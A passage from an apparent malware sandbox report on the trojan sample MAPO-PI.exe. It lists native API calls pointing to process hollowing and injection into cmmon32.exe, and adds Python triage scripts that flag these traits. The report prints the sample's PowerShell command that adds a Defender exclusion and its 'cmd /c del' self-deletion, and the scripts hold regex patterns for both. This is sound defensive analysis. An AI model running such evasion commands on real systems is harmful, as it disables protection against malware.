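    "00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp",
]

# Win32 PAGE_* protection constants (winnt.h) that grant execute or write.
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}   # PAGE_EXECUTE, _READ, _READWRITE, _WRITECOPY
WRITABLE = {0x04, 0x08, 0x40, 0x80}     # PAGE_READWRITE, _WRITECOPY, PAGE_EXECUTE_READWRITE, _WRITECOPY

# Assumed field layout of the two sandbox name forms (see the lead-in).
SDMP = re.compile(r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\.([0-9A-Fa-f]{16})"
                  r"\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$")
UNPACK = re.compile(r"^(\d+)\.(\d+)\.(.+?)\.([0-9a-f]+)\.(\d+)\.(raw\.)?unpack$")


def parse_source(name):
    """Decode one Yara source name into process index, base address and, for
    memory dumps, the page protection the region was dumped with."""
    m = SDMP.match(name)
    if m:
        return {"kind": "memory", "process": int(m[1], 16), "snapshot": int(m[2], 16),
                "base": int(m[4], 16), "protect": int(m[5], 16), "image": None}
    m = UNPACK.match(name)
    if m:
        return {"kind": "unpacked_pe", "process": int(m[1]), "snapshot": int(m[2]),
                "base": int(m[4], 16), "protect": None, "image": m[3]}
    raise ValueError(f"unrecognised source name: {name}")


def triage(sources, names=None):
    """Per process: every base address with a hit, the subset dumped as
    executable-and-writable memory, and the bases a PE was carved from.
    Process names come from the .unpack names where present, else from `names`."""
    names = dict(names or {})
    acc = defaultdict(lambda: {"bases": set(), "rwx_bases": set(), "unpacked_pe": set()})
    for src in sources:
        info = parse_source(src)
        p = acc[info["process"]]
        p["bases"].add(info["base"])
        if info["kind"] == "unpacked_pe":
            p["unpacked_pe"].add(info["base"])
            names.setdefault(info["process"], info["image"])
        elif info["protect"] in EXECUTABLE and info["protect"] in WRITABLE:
            p["rwx_bases"].add(info["base"])
    return {pid: {"name": names.get(pid, "unknown"),
                  "bases": sorted(p["bases"]),
                  "rwx_bases": sorted(p["rwx_bases"]),
                  "unpacked_pe": sorted(p["unpacked_pe"])}
            for pid, p in sorted(acc.items())}


def hollowed_image_candidates(summary, image_base=0x400000):
    """Processes whose main-module image base (0x400000, the default for a
    32-bit PE like this sample) was dumped executable-and-writable. A process's
    own image should never be in that state; a payload hit there is the
    footprint of process hollowing rather than of a remote-thread injection."""
    return [pid for pid, p in summary.items() if image_base in p["rwx_bases"]]


if __name__ == "__main__":
    summary = triage(YARA_HITS, {16: "cmmon32.exe"})
    for pid, p in summary.items():
        print(pid, p["name"], "rwx:", [hex(b) for b in p["rwx_bases"]],
              "carved PE:", [hex(b) for b in p["unpacked_pe"]])
    print("hollowed image base in:", hollowed_image_candidates(summary))
```

Read against this report: process 0 (the original MAPO-PI.exe) only ever holds the payload in PAGE_READWRITE memory, consistent with a decrypted copy staged before injection; process 3 (the second MAPO-PI.exe) holds it executable-and-writable at the image base 0x400000, which is what the process-hollowing signature in the overview refers to; processes 4 and 16 (cmmon32.exe) hold executable-and-writable regions away from any image base, the usual footprint of injected code.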
          Source: C:\Users\user\Desktop\MAPO-PI.exe | Code function: 0_2_00075376
          Source: C:\Users\user\Desktop\MAPO-PI.exe | Code function: 0_2_0094E6A0
          Source: C:\Users\user\Desktop\MAPO-PI.exe | Code function: 0_2_0094E690
          Source: C:\Users\user\Desktop\MAPO-PI.exe | Code function: 0_2_0094CC5C
          Source: C:\Users\user\Desktop\MAPO-PI.exe | Code function: 0_2_00072050
          Source: C:\Users\user\Desktop\MAPO-PI.exe | Code function: 3_2_00401030
          Source: C:\Users\user\Desktop\MAPO-PI.exe | Code function: 3_2_0041E269
          Source: C:\Users\user\Desktop\MAPO-PI.exe | Code function: 3_2_0041DA87
          Source: C:\Users\user\Desktop\MAPO-PI.exe | Code function: 3_2_0041D475
          Source: C:\Users\user\Desktop\MAPO-PI.exe | Code function: 3_2_00402D90
          Source: C:\Users\user\Desktop\MAPO-PI.exe | Code function: 3_2_00409E2B
          Source: C:\Users\user\Desktop\MAPO-PI.exe | Code function: 3_2_00409E30
          Source: C:\Users\user\Desktop\MAPO-PI.exe | Code function: 3_2_0041DFFF
          Source: C:\Users\user\Desktop\MAPO-PI.exe | Code function: 3_2_0041CF96
          Source: C:\Users\user\Desktop\MAPO-PI.exe | Code function: 3_2_00402FB0
          Source: C:\Users\user\Desktop\MAPO-PI.exe | Code function: 3_2_00EB5376
          Source: C:\Users\user\Desktop\MAPO-PI.exe | Code function: 3_2_018B99BF
          Source: C:\Users\user\Desktop\MAPO-PI.exe | Code function: 3_2_0189F900
          Source: C:\Users\user\Desktop\MAPO-PI.exe | Code function: 3_2_018B4120
          Source: C:\Users\user\Desktop\MAPO-PI.exe | Code function: 3_2_018AB090
          Source: C:\Users\user\Desktop\MAPO-PI.exe | Code function: 3_2_018C20A0
          Source: C:\Users\user\Desktop\MAPO-PI.exe | Code function: 3_2_019620A8
          Source: C:\Users\user\Desktop\MAPO-PI.exe | Code function: 3_2_019628EC
          Source: C:\Users\user\Desktop\MAPO-PI.exe | Code function: 3_2_01951002
          Source: C:\Users\user\Desktop\MAPO-PI.exe | Code function: 3_2_0196E824
          Source: C:\Users\user\Desktop\MAPO-PI.exe | Code function: 3_2_018BA830
          Source: C:\Users\user\Desktop\MAPO-PI.exe | Code function: 3_2_018CEBB0
          Source: C:\Users\user\Desktop\MAPO-PI.exe | Code function: 3_2_0195DBD2
          Source: C:\Users\user\Desktop\MAPO-PI.exe | Code function: 3_2_019503DA
          Source: C:\Users\user\Desktop\MAPO-PI.exe | Code function: 3_2_018CABD8
          Source: C:\Users\user\Desktop\MAPO-PI.exe | Code function: 3_2_019423E3
          Source: C:\Users\user\Desktop\MAPO-PI.exe | Code function: 3_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exe | Code function: 3_2_01962B28
          Source: C:\Users\user\Desktop\MAPO-PI.exe | Code function: 3_2_018BAB40
          Source: C:\Users\user\Desktop\MAPO-PI.exe | Code function: 3_2_019622AE
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0194FA2B
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C2581
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01952D82
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019625DD
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018AD5E0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01962D07
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01890D20
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01961D55
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A841F
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195D466
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0196DFCE
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01961FF1
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01962EF7
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195D616
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B6E30
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00EB2050
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D2D466
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C7841F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D325DD
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C7D5E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C92581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D31D55
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D32D07
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C60D20
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D32EF7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D2D616
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C86E30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D3DFCE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D31FF1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D328EC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C7B090
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C920A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D320A8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D21002
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D3E824
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C8A830
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C899BF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C6F900
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C84120
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D322AE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D1FA2B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D2DBD2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D203DA
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C9EBB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C8AB40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D32B28
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_0304E269
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_0304DA87
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_0304CF96
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03032FB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_0304DFFF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03039E2B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03039E30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03032D90
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_0304D475
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 04C6B150 appears 66 times
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: String function: 0189B150 appears 133 times
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00419D50 NtCreateFile,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00419E00 NtReadFile,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00419E80 NtClose,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00419F30 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00419D4A NtCreateFile,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00419DFB NtReadFile,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00419DA2 NtCreateFile,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00419E7A NtClose,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00419F2D NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018DB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018DA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018DAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9560 NtWriteFile,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018DA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018DA770 NtOpenThread,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D96D0 NtCreateKey,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CAAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CAA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CAA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CAB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CAA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03049F30 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03049E00 NtReadFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03049E80 NtClose,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03049D50 NtCreateFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03049F2D NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03049E7A NtClose,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03049D4A NtCreateFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03049DA2 NtCreateFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03049DFB NtReadFile,
Source: MAPO-PI.exe | Binary or memory string: OriginalFilename vs MAPO-PI.exe
Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameTaskNode.dll4 vs MAPO-PI.exe
Source: MAPO-PI.exe, 00000000.00000002.237713929.00000000006E0000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs MAPO-PI.exe
Source: MAPO-PI.exe, 00000000.00000002.237496370.000000000008A000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameDebugVi.exe< vs MAPO-PI.exe
Source: MAPO-PI.exe | Binary or memory string: OriginalFilename vs MAPO-PI.exe
Source: MAPO-PI.exe, 00000003.00000000.232786703.0000000000ECA000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameDebugVi.exe< vs MAPO-PI.exe
Source: MAPO-PI.exe, 00000003.00000002.293450051.0000000001859000.00000040.00020000.sdmp | Binary or memory string: OriginalFilenameCMMON32.exe` vs MAPO-PI.exe
Source: MAPO-PI.exe, 00000003.00000002.293616666.000000000198F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs MAPO-PI.exe
Source: MAPO-PI.exe | Binary or memory string: OriginalFilenameDebugVi.exe< vs MAPO-PI.exe
Source: MAPO-PI.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MAPO-PI.exe | Virustotal: Detection: 30%
Source: MAPO-PI.exe | ReversingLabs: Detection: 39%
Source: MAPO-PI.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\MAPO-PI.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\MAPO-PI.exe 'C:\Users\user\Desktop\MAPO-PI.exe'
Source: C:\Users\user\Desktop\MAPO-PI.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\MAPO-PI.exe | Process created: C:\Users\user\Desktop\MAPO-PI.exe C:\Users\user\Desktop\MAPO-PI.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: C:\Windows\SysWOW64\cmmon32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\MAPO-PI.exe'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\MAPO-PI.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe'
Source: C:\Users\user\Desktop\MAPO-PI.exe | Process created: C:\Users\user\Desktop\MAPO-PI.exe C:\Users\user\Desktop\MAPO-PI.exe
Source: C:\Windows\SysWOW64\cmmon32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\MAPO-PI.exe'
Source: C:\Users\user\Desktop\MAPO-PI.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Users\user\Desktop\MAPO-PI.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MAPO-PI.exe.log
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p05gvjwq.ucq.ps1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@10/5@3/3
Source: C:\Users\user\Desktop\MAPO-PI.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\MAPO-PI.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: MAPO-PI.exe | Joe Sandbox Cloud Basic: Detection: clean Score: 0
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5196:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6084:120:WilError_01
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\MAPO-PI.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: MAPO-PI.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: MAPO-PI.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cmmon32.pdb source: MAPO-PI.exe, 00000003.00000002.293436175.0000000001850000.00000040.00020000.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: MAPO-PI.exe, 00000003.00000002.293436175.0000000001850000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: MAPO-PI.exe, 00000003.00000002.293616666.000000000198F000.00000040.00000001.sdmp, cmmon32.exe, 00000010.00000002.497241388.0000000004C40000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: MAPO-PI.exe, cmmon32.exe
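The native calls resolved in process 3 above (NtCreateProcessEx, NtUnmapViewOfSection, NtWriteVirtualMemory, NtSetContextThread, NtResumeThread, NtQueueApcThread) and the process tree (powershell.exe adding a Defender exclusion, explorer.exe spawning cmmon32.exe, cmmon32.exe running cmd /c del on the dropped file) are the pieces a triage script should pull out of a report like this. The following Python is an added example, not part of the Joe Sandbox report or of its tooling. It assumes the report has been exported as plain text in the layout seen on this page (`Source: <image>Code function: <pid>_<n>_<addr> <Api>,` and `Source: <parent>Process created: <cmdline>`, with or without a ` | ` separator); the sample lines embedded in it are copied from the report above, and the grouping of native calls into hollowing and APC primitives is this example's own heuristic, not a Joe Sandbox rule.

```python
import re
from collections import defaultdict

# Report line shapes (an optional " | " between the source image and the event is accepted).
CODE_RE = re.compile(
    r"^Source: (?P<image>.+?)(?: \| )?Code function: "
    r"(?P<pid>\d+)_\d+_[0-9A-Fa-f]+ (?P<apis>[A-Za-z0-9_,]+)$"
)
PROC_RE = re.compile(r"^Source: (?P<parent>.+?)(?: \| )?Process created: (?P<cmdline>.+)$")
DEFENDER_EXCLUSION_RE = re.compile(r"Add-MpPreference\s+-Exclusion", re.IGNORECASE)
SELF_DELETE_RE = re.compile(r"\bcmd\.exe\s+/c\s+del\b", re.IGNORECASE)

# Heuristic (this example's own): write, redirect a thread, resume it is the minimum a
# hollowed or suspended target needs; the support set is listed when the core set is hit.
HOLLOWING_CORE = {"NtWriteVirtualMemory", "NtSetContextThread", "NtResumeThread"}
HOLLOWING_SUPPORT = {"NtCreateProcessEx", "NtUnmapViewOfSection", "NtCreateSection", "NtMapViewOfSection"}
APC_INJECTION = {"NtWriteVirtualMemory", "NtQueueApcThread"}

# Constructed sample: lines copied from the report above, in this page's flattened layout.
SAMPLE_REPORT = r"""
Source: C:\Users\user\Desktop\MAPO-PI.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe'
Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
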